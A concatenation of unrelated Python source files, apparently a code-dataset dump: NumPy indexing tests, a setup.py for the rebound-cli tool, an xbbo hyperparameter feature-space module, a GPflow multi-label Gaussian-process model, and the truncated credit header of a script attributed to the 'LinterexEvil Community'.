assert_equal(np.unravel_index(2, (2, 2)), (1, 0))
assert_equal(np.ravel_multi_index((1, 0), (2, 2)), 2)
assert_equal(np.unravel_index(254, (17, 94)), (2, 66))
assert_equal(np.ravel_multi_index((2, 66), (17, 94)), 254)
assert_raises(ValueError, np.unravel_index, -1, (2, 2))
assert_raises(TypeError, np.unravel_index, 0.5, (2, 2))
assert_raises(ValueError, np.unravel_index, 4, (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (-3, 1), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (2, 1), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (0, -3), (2, 2))
assert_raises(ValueError, np.ravel_multi_index, (0, 2), (2, 2))
assert_raises(TypeError, np.ravel_multi_index, (0.1, 0.), (2, 2))
assert_equal(np.unravel_index((2*3 + 1)*6 + 4, (4, 3, 6)), [2, 1, 4])
assert_equal(
np.ravel_multi_index([2, 1, 4], (4, 3, 6)), (2*3 + 1)*6 + 4)
arr = np.array([[3, 6, 6], [4, 5, 1]])
assert_equal(np.ravel_multi_index(arr, (7, 6)), [22, 41, 37])
assert_equal(
np.ravel_multi_index(arr, (7, 6), order='F'), [31, 41, 13])
assert_equal(
np.ravel_multi_index(arr, (4, 6), mode='clip'), [22, 23, 19])
assert_equal(np.ravel_multi_index(arr, (4, 4), mode=('clip', 'wrap')),
[12, 13, 13])
assert_equal(np.ravel_multi_index((3, 1, 4, 1), (6, 7, 8, 9)), 1621)
assert_equal(np.unravel_index(np.array([22, 41, 37]), (7, 6)),
[[3, 6, 6], [4, 5, 1]])
assert_equal(
np.unravel_index(np.array([31, 41, 13]), (7, 6), order='F'),
[[3, 6, 6], [4, 5, 1]])
assert_equal(np.unravel_index(1621, (6, 7, 8, 9)), [3, 1, 4, 1])
def test_dtypes(self):
# Test with different data types
for dtype in [np.int16, np.uint16, np.int32,
np.uint32, np.int64, np.uint64]:
coords = np.array(
[[1, 0, 1, 2, 3, 4], [1, 6, 1, 3, 2, 0]], dtype=dtype)
shape = (5, 8)
uncoords = 8*coords[0]+coords[1]
assert_equal(np.ravel_multi_index(coords, shape), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape))
uncoords = coords[0]+5*coords[1]
assert_equal(
np.ravel_multi_index(coords, shape, order='F'), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape, order='F'))
coords = np.array(
[[1, 0, 1, 2, 3, 4], [1, 6, 1, 3, 2, 0], [1, 3, 1, 0, 9, 5]],
dtype=dtype)
shape = (5, 8, 10)
uncoords = 10*(8*coords[0]+coords[1])+coords[2]
assert_equal(np.ravel_multi_index(coords, shape), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape))
uncoords = coords[0]+5*(coords[1]+8*coords[2])
assert_equal(
np.ravel_multi_index(coords, shape, order='F'), uncoords)
assert_equal(coords, np.unravel_index(uncoords, shape, order='F'))
def test_clipmodes(self):
# Test clipmodes
assert_equal(
np.ravel_multi_index([5, 1, -1, 2], (4, 3, 7, 12), mode='wrap'),
np.ravel_multi_index([1, 1, 6, 2], (4, 3, 7, 12)))
assert_equal(np.ravel_multi_index([5, 1, -1, 2], (4, 3, 7, 12),
mode=(
'wrap', 'raise', 'clip', 'raise')),
np.ravel_multi_index([1, 1, 0, 2], (4, 3, 7, 12)))
assert_raises(
ValueError, np.ravel_multi_index, [5, 1, -1, 2], (4, 3, 7, 12))
class TestGrid(TestCase):
def test_basic(self):
a = mgrid[-1:1:10j]
b = mgrid[-1:1:0.1]
assert_(a.shape == (10,))
assert_(b.shape == (20,))
assert_(a[0] == -1)
assert_almost_equal(a[-1], 1)
assert_(b[0] == -1)
assert_almost_equal(b[1]-b[0], 0.1, 11)
assert_almost_equal(b[-1], b[0]+19*0.1, 11)
assert_almost_equal(a[1]-a[0], 2.0/9.0, 11)
def test_linspace_equivalence(self):
y, st = np.linspace(2, 10, retstep=1)
assert_almost_equal(st, 8/49.0)
assert_array_almost_equal(y, mgrid[2:10:50j], 13)
def test_nd(self):
c = mgrid[-1:1:10j, -2:2:10j]
d = mgrid[-1:1:0.1, -2:2:0.2]
assert_(c.shape == (2, 10, 10))
assert_(d.shape == (2, 20, 20))
assert_array_equal(c[0][0, :], -ones(10, 'd'))
assert_array_equal(c[1][:, 0], -2*ones(10, 'd'))
assert_array_almost_equal(c[0][-1, :], ones(10, 'd'), 11)
assert_array_almost_equal(c[1][:, -1], 2*ones(10, 'd'), 11)
assert_array_almost_equal(d[0, 1, :]-d[0, 0, :], 0.1*ones(20, 'd'), 11)
assert_array_almost_equal(d[1, :, 1]-d[1, :, 0], 0.2*ones(20, 'd'), 11)
class TestConcatenator(TestCase):
def test_1d(self):
assert_array_equal(r_[1, 2, 3, 4, 5, 6], array([1, 2, 3, 4, 5, 6]))
b = ones(5)
c = r_[b, 0, 0, b]
assert_array_equal(c, [1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1])
def test_mixed_type(self):
g = r_[10.1, 1:10]
assert_(g.dtype == 'f8')
def test_more_mixed_type(self):
g = r_[-10.1, array([1]), array([2, 3, 4]), 10.0]
assert_(g.dtype == 'f8')
def test_2d(self):
b = rand(5, 5)
c = rand(5, 5)
d = r_['1', b, c] # append columns
assert_(d.shape == (5, 10))
assert_array_equal(d[:, :5], b)
assert_array_equal(d[:, 5:], c)
d = r_[b, c]
assert_(d.shape == (10, 5))
assert_array_equal(d[:5, :], b)
assert_array_equal(d[5:, :], c)
class TestNdenumerate(TestCase):
def test_basic(self):
a = array([[1, 2], [3, 4]])
assert_equal(list(ndenumerate(a)),
[((0, 0), 1), ((0, 1), 2), ((1, 0), 3), ((1, 1), 4)])
class TestIndexExpression(TestCase):
def test_regression_1(self):
# ticket #1196
a = np.arange(2)
assert_equal(a[:-1], a[s_[:-1]])
assert_equal(a[:-1], a[index_exp[:-1]])
def test_simple_1(self):
a = np.random.rand(4, 5, 6)
assert_equal(a[:, :3, [1, 2]], a[index_exp[:, :3, [1, 2]]])
assert_equal(a[:, :3, [1, 2]], a[s_[:, :3, [1, 2]]])
def test_c_():
a = np.c_[np.array([[1, 2, 3]]), 0, 0, np.array([[4, 5, 6]])]
assert_equal(a, [[1, 2, 3, 0, 0, 4, 5, 6]])
def test_fill_diagonal():
a = zeros((3, 3), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5]]))
#Test tall matrix
a = zeros((10, 3), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]))
#Test tall matrix wrap
a = zeros((10, 3), int)
fill_diagonal(a, 5, True)
yield (assert_array_equal, a,
array([[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[5, 0, 0],
[0, 5, 0],
[0, 0, 5],
[0, 0, 0],
[5, 0, 0],
[0, 5, 0]]))
#Test wide matrix
a = zeros((3, 10), int)
fill_diagonal(a, 5)
yield (assert_array_equal, a,
array([[5, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 5, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 5, 0, 0, 0, 0, 0, 0, 0]]))
# The same function can operate on a 4-d array:
a = zeros((3, 3, 3, 3), int)
fill_diagonal(a, 4)
i = array([0, 1, 2])
yield (assert_equal, where(a != 0), (i, i, i, i))
def test_diag_indices():
di = diag_indices(4)
a = array([[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12],
[13, 14, 15, 16]])
a[di] = 100
yield (assert_array_equal, a,
array([[100, 2, 3, 4],
[5, 100, 7, 8],
[9, 10, 100, 12],
[13, 14, 15, 100]]))
# Now, we create indices to manipulate a 3-d array:
d3 = diag_indices(2, 3)
# And use it to set the diagonal of a zeros array to 1:
a = zeros((2, 2, 2), int)
a[d3] = 1
yield (assert_array_equal, a,
array([[[1, 0],
[0, 0]],
[[0, 0],
[0, 1]]]))
def test_diag_indices_from():
x = np.random.random((4, 4))
r, c = diag_indices_from(x)
assert_array_equal(r, np.arange(4))
assert_array_equal(c, np.arange(4))
def test_ndindex():
x = list(np.ndindex(1, 2, 3))
expected = [ix for ix, e in np.ndenumerate(np.zeros((1, 2, 3)))]
assert_array_equal(x, expected)
x = list(np.ndindex((1, 2, 3)))
assert_array_equal(x, expected)
# Test use of scalars and tuples
x = list(np.ndindex((3,)))
assert_array_equal(x, list(np.ndindex(3)))
# Make sure size argument is optional
x = list(np.ndindex())
assert_equal(x, [()])
x = list(np.ndindex(()))
assert_equal(x, [()])
if __name__ == "__main__":
run_module_suite()
|
py | b415300d1c4658433782d6d233bb6c4e66b9bdc2 | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from codecs import open
import sys
if sys.version_info[:3] < (3, 0, 0):
print("Requires Python 3 to run.")
sys.exit(1)
with open("README.md", encoding="utf-8") as file:
readme = file.read()
setup(
name="rebound-cli",
version="2.1.0",
description="Command-line tool that automatically fetches Stack Overflow results after compiler errors",
#long_description=readme,
#long_description_content_type="text/markdown",
url="https://github.com/shobrook/rebound",
author="shobrook",
author_email="[email protected]",
classifiers=[
"Environment :: Console",
"Intended Audience :: Developers",
"Topic :: Software Development",
"Topic :: Software Development :: Debuggers",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python"
],
keywords="stackoverflow stack overflow debug debugging error-handling compile errors error message cli search commandline",
include_package_data=True,
packages=["rebound"],
entry_points={"console_scripts": ["rebound = rebound.rebound:main"]},
install_requires=["BeautifulSoup4", "requests", "urllib3", "urwid"],
requires=["BeautifulSoup4", "requests", "urllib3", "urwid"],
python_requires=">=3",
license="MIT"
)
|
py | b41533d110fca69265b0503dd5f35ea69edf268c | import warnings
import ConfigSpace as CS
import numpy as np
from scipy import stats
from xbbo.configspace.abstract_feature_space import (
AbstractFeatureSpace,
Identity,
Ord2Uniform,
Cat2Onehot,
U2gaussian,
Category,
Ordinal,
U2Onehot
)
class FeatureSpace_discrete_all_oneHot(AbstractFeatureSpace):
'''
sparse array <=> feature space
all variable i.i.d ~ U(0, 1)
'''
def __init__(self, discrete_degree):
super().__init__()
# self.dtypes_idx_map = dtypes_idx_map
# self.discrete_degree = discrete_degree
self.discrete_degree = discrete_degree
self.unif = U2Onehot()
self.cat = Cat2Onehot()
self.ord = Cat2Onehot()
self.features_ = []
self.src_ids = []
self.trg_ids = []
self.dtypes_idx_map = {
'cat': Array_idx_map(),
'int': Array_idx_map(),
'float': Array_idx_map(),
'ord': Array_idx_map(),
}
nums, ords, cats, size_sparse, size_dense, categories = self._get_mappings()
if nums:
self.dtypes_idx_map['float'].src_ids, self.dtypes_idx_map['float'].trg_ids, self.dtypes_idx_map[
'float'].cat_sizes = \
map(np.uintp, zip(*nums))
self.dtypes_idx_map['float'].cats = nums
if ords:
self.dtypes_idx_map['ord'].src_ids, self.dtypes_idx_map['ord'].trg_ids, self.dtypes_idx_map[
'ord'].cat_sizes = \
map(np.uintp, zip(*ords))
self.dtypes_idx_map['ord'].cats = ords
if cats:
self.dtypes_idx_map['cat'].src_ids, self.dtypes_idx_map['cat'].trg_ids, self.dtypes_idx_map[
'cat'].cat_sizes = \
map(np.uintp, zip(*cats))
self.dtypes_idx_map['cat'].cats = cats
# self.nums = nums
# self.cats = cats
self.categories = np.asarray(categories)
self.sparse_dimension = size_sparse
self.dense_dimension = size_dense
def _get_mappings(self):
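        # Build (sparse index, dense index, one-hot size) triples per
        # hyperparameter: categoricals/ordinals use their number of choices,
        # while numeric parameters are discretized into `discrete_degree` bins.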
nums = []
# nums_float = []
# nums_ord = []
cats = []
ords = []
categories = []
src_ind = trg_ind = 0
for src_ind, hp in enumerate(self.space.get_hyperparameters()):
if isinstance(hp, CS.CategoricalHyperparameter):
cat_size = hp.num_choices
cats.append((src_ind, trg_ind, cat_size))
trg_ind += cat_size
categories.append(len(hp.choices))
elif isinstance(hp, (CS.UniformIntegerHyperparameter,CS.UniformFloatHyperparameter)):
nums.append((src_ind, trg_ind, self.discrete_degree))
categories.append(self.discrete_degree)
trg_ind += self.discrete_degree
elif isinstance(hp, CS.OrdinalHyperparameter):
categories.append(len(hp.sequence))
cat_size = hp.num_elements
ords.append((src_ind, trg_ind, cat_size))
trg_ind += cat_size
# elif isinstance(hp, (CS.UniformIntegerHyperparameter,
# CS.UniformFloatHyperparameter,
# CS.OrdinalHyperparameter)):
# nums.append((src_ind, trg_ind))
else:
raise NotImplementedError(
"Only hyperparameters of types "
"`CategoricalHyperparameter`, "
"`UniformIntegerHyperparameter`, "
"`OrdinalHyperparameter`, "
"`UniformFloatHyperparameter` are supported!")
size_sparse = src_ind + 1
size_dense = trg_ind
return nums, ords, cats, size_sparse, size_dense, categories
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.unif.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.unif.sparse_array_to_feature(
array[src_ind], size
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class FeatureSpace_uniform(AbstractFeatureSpace):
'''
sparse array <=> feature space
    all variables i.i.d. ~ U(0, 1)
'''
def __init__(self, dtypes_idx_map):
super().__init__()
self.dtypes_idx_map = dtypes_idx_map
self.unif = Identity()
self.cat = Cat2Onehot()
self.ord = Ord2Uniform()
self.features_ = []
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
x_array[array_idx_map.src_ids] = \
self.unif.feature_to_sparse_array(
x_feature[array_idx_map.trg_ids]
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
feature[array_idx_map.trg_ids] = \
self.unif.sparse_array_to_feature(
array[array_idx_map.src_ids]
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class FeatureSpace_gaussian(AbstractFeatureSpace):
'''
sparse array <=> feature space
    all variables i.i.d. ~ standard normal N(0, 1)
'''
def __init__(self, dtypes_idx_map):
super().__init__()
self.dtypes_idx_map = dtypes_idx_map
self.unif = U2gaussian()
self.cat = Category()
self.ord = Ordinal()
self.features_ = []
def feature_to_array(self, x_feature, sparse_dim):
'''
return sparse array for construct Configurations
'''
assert not (self.dtypes_idx_map is None)
x_array = np.empty(shape=(sparse_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.cat.feature_to_sparse_array(
x_feature[trg_ind:trg_ind + size], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
x_array[src_ind] = \
self.ord.feature_to_sparse_array(
x_feature[trg_ind], size
)
# x_array[array_idx_map.src_ids] = \
# self.ord.feature_to_sparse_array(
# x_feature[array_idx_map.trg_ids],
# )
elif dtype in ('float', 'int'):
x_array[array_idx_map.src_ids] = \
self.unif.feature_to_sparse_array(
x_feature[array_idx_map.trg_ids]
)
else:
pass
return x_array
def array_to_feature(self, array, dense_dim): # TODO
warnings.warn("This method may no reason be called?")
assert not (self.dtypes_idx_map is None)
feature = np.zeros(shape=(dense_dim))
for dtype, array_idx_map in self.dtypes_idx_map.items():
# if array_idx_map.src_ids:
if array_idx_map.src_ids is None:
continue
if dtype == 'cat':
# for src_ind, trg_ind, size in (array_idx_map.cats):
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind:trg_ind+size] = \
self.cat.sparse_array_to_feature(
array[src_ind], size
)
elif dtype == 'ord':
for src_ind, trg_ind, size in (array_idx_map.cats):
feature[trg_ind] = \
self.ord.sparse_array_to_feature(
array[src_ind], size
)
elif dtype in ('float', 'int'):
feature[array_idx_map.trg_ids] = \
self.unif.sparse_array_to_feature(
array[array_idx_map.src_ids]
)
else:
pass
return feature
def record_feature(self, feature):
self.features_.append(feature)
class Uniform2Gaussian(AbstractFeatureSpace):
def __init__(self):
super().__init__()
def array_to_feature(self, array):
return stats.norm.ppf(array)
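    # array_to_feature maps values in (0, 1) to standard-normal features via the
    # inverse CDF (probit); feature_to_array below applies the CDF, so a round
    # trip recovers the original uniform values.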
def feature_to_array(self, feature):
return stats.norm.cdf(feature) |
py | b41534707893d45f1d5aa0c66560464f82b37651 | from typing import Optional, Tuple, TypeVar
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import sys
import os
from itertools import product
from gpflow.base import Module, Parameter
from gpflow.config import default_float, default_jitter, set_default_float
from gpflow.utilities import ops, positive, triangular
Data = TypeVar('Data', Tuple[tf.Tensor, tf.Tensor], tf.Tensor)
class MLGPF_model(Module):
def __init__(self,
num_points: int,
num_labels: int,
num_dim: int,
num_factors: int = 30,
num_inducings: int = 400,
lengthscales: tf.Tensor = None,
Z_init: tf.Tensor = None,
jitter: np.float = 1e-6,
q_mu: tf.Tensor = None,
q_sqrt: tf.Tensor = None,
use_se: bool = False,
use_linear: bool = False,
use_se_plus_linear: bool = False,
N_GH: int = 10):
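        # Gauss-Hermite quadrature setup: hermgauss returns nodes/weights for
        # integrals weighted by exp(-x^2), so the nodes are rescaled by sqrt(2)
        # and the weights by 1/sqrt(pi) to approximate expectations under a
        # standard normal distribution.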
x_gh, w_gh = np.polynomial.hermite.hermgauss(N_GH)
self.x_gh_3d, self.w_gh = tf.cast(np.sqrt(2)*x_gh[:, np.newaxis, np.newaxis], dtype=default_float()), tf.cast(w_gh / np.sqrt(np.pi), dtype=default_float())
self.jitter_eye = tf.cast(jitter*np.eye(num_inducings), dtype=default_float())
self.num_points = tf.cast(num_points, dtype=default_float())
self.const_PM = tf.cast(num_factors*num_inducings, dtype=default_float())
self.const_P = tf.cast(num_factors, dtype=default_float())
self.M_ones = tf.ones([num_inducings, 1], dtype=default_float())
self.P_ones_2d = tf.ones([num_factors, 1], dtype=default_float())
self.P_ones_3d = tf.ones([num_factors, 1 ,1], dtype=default_float())
self.use_se = use_se
self.use_linear = use_linear
self.use_se_plus_linear = use_se_plus_linear
lengthscales = np.ones(num_dim) if lengthscales is None else lengthscales
q_mu = 0.5 * np.ones((num_inducings, num_factors)) if q_mu is None else q_mu
q_sqrt = tfp.math.fill_triangular_inverse(np.array([0.2*np.eye(num_inducings) for _ in range(num_factors)])) if q_sqrt is None else q_sqrt
        Z_init = 0.2 * np.random.rand(num_inducings, num_dim) if Z_init is None else Z_init
if lengthscales.size != num_dim:
print('Dimension mismatch: Variable \"lengthscales\" must be of size ({},)' .format(num_dim) )
sys.exit(1)
if q_mu.shape[0] != num_inducings or q_mu.shape[1] != num_factors:
print('Dimension mismatch: Variable \"q_mu\" must be of size ({},{})' .format(num_inducings, num_factors) )
sys.exit(1)
if q_sqrt.shape[0] != num_factors or q_sqrt.shape[1] != int(0.5*num_inducings*(num_inducings + 1)):
print('Dimension mismatch: Variable \"q_sqrt\" must be of size ({},{})' .format(num_factors, int(0.5*num_inducings*(num_inducings + 1))) )
sys.exit(1)
if Z_init.shape[0] != num_inducings or Z_init.shape[1] != num_dim:
print('Dimension mismatch: Variable \"Z_init\" must be of size ({},{})' .format(num_inducings, num_dim) )
sys.exit(1)
self.Phi = Parameter(np.random.randn(num_labels, num_factors)/np.sqrt(num_factors), dtype=default_float())
self.bias_vec = Parameter(np.random.randn(num_labels, 1)/np.sqrt(num_factors), dtype=default_float())
self.Z_unorm = Parameter(Z_init, dtype=default_float())
self.lengthscales = Parameter(lengthscales, transform=positive(), dtype=default_float())
self.q_mu = Parameter(q_mu, dtype=default_float())
self.q_sqrt = Parameter(q_sqrt, dtype=default_float())
if self.use_se_plus_linear:
self.se_var = Parameter(1., transform=positive(), dtype=default_float())
self.linear_var = Parameter(1., transform=positive(), dtype=default_float())
def se_kernel(self, batch_X):
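        # Squared-exponential kernel on L2-normalized, lengthscale-weighted
        # inputs. Squared distances are expanded as ||x||^2 + ||z||^2 - 2*x.z so
        # that only sparse matmuls against the minibatch are required.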
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Z_dot_Z = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) # M x M
X_dot_Z = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
Z_mul_sum = tf.linalg.diag_part(Z_dot_Z) # (M, )
H_p = self.M_ones * Z_mul_sum
A_p = H_p + tf.transpose(H_p) - 2.*Z_dot_Z
A_k2_tmp = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1) - 2.*tf.transpose(X_dot_Z) # M x minibatch
A_k2 = tf.transpose(A_k2_tmp) + Z_mul_sum # minibatch x M
K_mm = tf.exp(-A_p) + self.jitter_eye # M x M
K_mn = tf.exp(-A_k2) # minibatch_size x M
K_mn = tf.transpose(K_mn) # M x minibatch_size
return K_mm, K_mn, 1.
def linear_kernel(self, batch_X):
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Xb_Lambda_sq_sum = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1)
K_mm = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) + self.jitter_eye # M x M
K_mn = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
K_mn = tf.transpose(K_mn) # M x minibatch_size
return K_mm, K_mn, Xb_Lambda_sq_sum
def se_plus_linear_kernel(self, batch_X):
denom = self.se_var + self.linear_var
norm_se_var, norm_linear_var = self.se_var / denom, self.linear_var / denom
Z_norm = tf.nn.l2_normalize(self.Z_unorm, 1)
Z_norm_ells_T = tf.transpose(Z_norm*self.lengthscales) # D x M
Xb_Lambda = batch_X.__mul__(self.lengthscales)
Z_dot_Z = tf.linalg.matmul(Z_norm_ells_T, Z_norm_ells_T, transpose_a=True) # M x M
X_dot_Z = tf.sparse.sparse_dense_matmul(Xb_Lambda, Z_norm_ells_T) # minibatch x M
Z_dot_X = tf.transpose(X_dot_Z) # M x minibatch_size
Xb_Lambda_sq_sum = tf.sparse.reduce_sum(tf.square(Xb_Lambda), 1)
Z_mul_sum = tf.linalg.diag_part(Z_dot_Z) # (M, )
H_p = self.M_ones * Z_mul_sum
A_p = H_p + tf.transpose(H_p) - 2.*Z_dot_Z
A_k2_tmp = Xb_Lambda_sq_sum - 2.*Z_dot_X # M x minibatch
A_k2 = tf.transpose(A_k2_tmp) + Z_mul_sum # minibatch x M
K_mm = norm_se_var * tf.exp(-A_p) + norm_linear_var * Z_dot_Z + self.jitter_eye # M x M
K_mn = norm_se_var * tf.exp(-A_k2) # minibatch_size x M
K_mn = tf.transpose(K_mn) + norm_linear_var * Z_dot_X # M x minibatch_size
return K_mm, K_mn, norm_linear_var * Xb_Lambda_sq_sum + norm_se_var
def neg_elbo(self, batch_XY) -> tf.Tensor:
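        # Negative evidence lower bound on the minibatch: a Gauss-Hermite
        # estimate of the expected softplus (logistic) loss over the labels,
        # rescaled by num_points / minibatch_size, plus the KL term between
        # q(u) and the GP prior at the inducing points.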
mask_minus_ones = tf.where(tf.sparse.to_dense(batch_XY[1]), -1, 1)
mask_minus_ones = tf.transpose(mask_minus_ones)
mask_minus_ones = tf.cast(mask_minus_ones, default_float())
q_sqrt_transf = tfp.math.fill_triangular(self.q_sqrt)
if self.use_linear :
K_mm, K_mn, var_kern = self.linear_kernel(batch_XY[0])
elif self.use_se_plus_linear:
K_mm, K_mn, var_kern = self.se_plus_linear_kernel(batch_XY[0])
else:
K_mm, K_mn, var_kern = self.se_kernel(batch_XY[0])
Lp = tf.linalg.cholesky(K_mm) # M x M
alpha = tf.linalg.triangular_solve(Lp, self.q_mu, lower=True) # M x P
Lq_diag = tf.linalg.diag_part(q_sqrt_transf) # P x M
Lp_full = self.P_ones_3d*Lp[None, :, :] # P x M x M
LpiLq = tf.linalg.triangular_solve(Lp_full, q_sqrt_transf, lower=True) # M x P
sum_log_sqdiag_Lp = tf.reduce_sum(tf.math.log(tf.square(tf.linalg.diag_part(Lp))))
KL_div = 0.5 * (self.const_P * sum_log_sqdiag_Lp + tf.reduce_sum(tf.square(alpha)) - self.const_PM - tf.reduce_sum(tf.math.log(tf.square(Lq_diag))) + tf.reduce_sum(tf.square(LpiLq)))
A = tf.linalg.triangular_solve(Lp, K_mn, lower=True) # M x minibatch_size
fvar = var_kern - tf.reduce_sum(tf.square(A), 0) # minibatch_size
fvar = self.P_ones_2d*fvar[None, :] # P x minibatch_size
A = tf.linalg.triangular_solve(tf.transpose(Lp), A, lower=False) # M x minibatch_size
fmean = tf.linalg.matmul(A, self.q_mu, transpose_a=True) # minibatch_size x P - Marginal mean
A = self.P_ones_3d*A[None, :, :] # P x M x minibatch_size
LTA = tf.linalg.matmul(q_sqrt_transf, A, transpose_a=True) # P x M x minibatch_size
fvar = fvar + tf.reduce_sum(tf.square(LTA), 1) # P x minibatch_size - Marginal variance
# Expectations computation
sum_dot_phi = (tf.linalg.matmul(self.Phi, fmean, transpose_b=True) + self.bias_vec)*mask_minus_ones # K x minibatch_size
sum_dot_phi_sqrt = tf.math.sqrt(tf.matmul(tf.square(self.Phi), fvar))*mask_minus_ones # K x minibatch_size
sum_dot_phi_sqrt = tf.expand_dims(sum_dot_phi_sqrt, 0)
sum_E_q_all = tf.reduce_sum(self.w_gh * tf.reduce_sum(tf.nn.softplus(sum_dot_phi - self.x_gh_3d*sum_dot_phi_sqrt), [1, 2]))
scale = self.num_points / tf.cast(tf.shape(fvar)[1], default_float())
return scale * sum_E_q_all + 0.5 * KL_div
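# Predictive mean of the latent functions at X_test, projected through
# Phi (plus bias) to output scores; no predictive variance is returned.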
def predict_scores(self, X_test) -> tf.Tensor:
if self.use_linear :
K_mm_test, K_mn_test, _ = self.linear_kernel(X_test)
elif self.use_se_plus_linear:
K_mm_test, K_mn_test, _ = self.se_plus_linear_kernel(X_test)
else:
K_mm_test, K_mn_test, _ = self.se_kernel(X_test)
Lp_test = tf.linalg.cholesky(K_mm_test)
A_test = tf.linalg.triangular_solve(Lp_test, K_mn_test, lower=True) # M x n_test
A_test = tf.linalg.triangular_solve(tf.transpose(Lp_test), A_test, lower=False) # M x n_test
fmean_test = tf.matmul(A_test, self.q_mu, transpose_a=True) # n_test x P
return tf.matmul(fmean_test, self.Phi, transpose_b=True) + tf.squeeze(self.bias_vec) # n_test x K
|
py | b41534bf301834e33448613f5b1dbe465e42d53f | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
LinterexEvil Community
Github:
https://github.com/LinterexEvilCommunity
Follow us On Instagram:
@linterexevilcommunityofficial
Buy Me A Coffee:
